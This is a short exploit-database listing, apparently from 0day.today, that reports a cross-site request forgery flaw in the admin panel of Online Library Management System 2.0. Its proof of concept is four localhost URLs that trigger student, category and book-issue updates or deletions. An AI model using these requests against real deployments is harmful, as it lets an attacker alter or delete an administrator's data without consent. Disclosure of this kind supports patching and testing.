[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Online Library Management System 2.0 Cross Site Request Forgery Vulnerability

Author
Mohit Dabas
Risk
[
Security Risk Low
]
0day-ID
0day-ID-36423
Category
web applications
Date add
15-06-2021
Platform
php
# Exploit Title: Online Library Management System
# Exploit Author : Mohit Dabas
# Vendor Homepage : https://phpgurukul.com
# Software Link : https://phpgurukul.com/online-library-management-system/
# Version: 2.0
# Tested on : LAMPP

# Description #

Online Library Management System has got CSRF in admin panel .Wherever the admin can update or delete option the CSRF exists.
Following are the Example URLs

# Proof of Concept (PoC) : Exploit #

http://127.0.0.1:8080/library/admin/reg-students.php?id=12
http://127.0.0.1:8080/library/admin/edit-category.php?catid=4
http://127.0.0.1:8080/library/admin/manage-categories.php?del=4
http://127.0.0.1:8080/library/admin/update-issue-bookdeails.php?rid=6

#  0day.today [2024-11-16]  #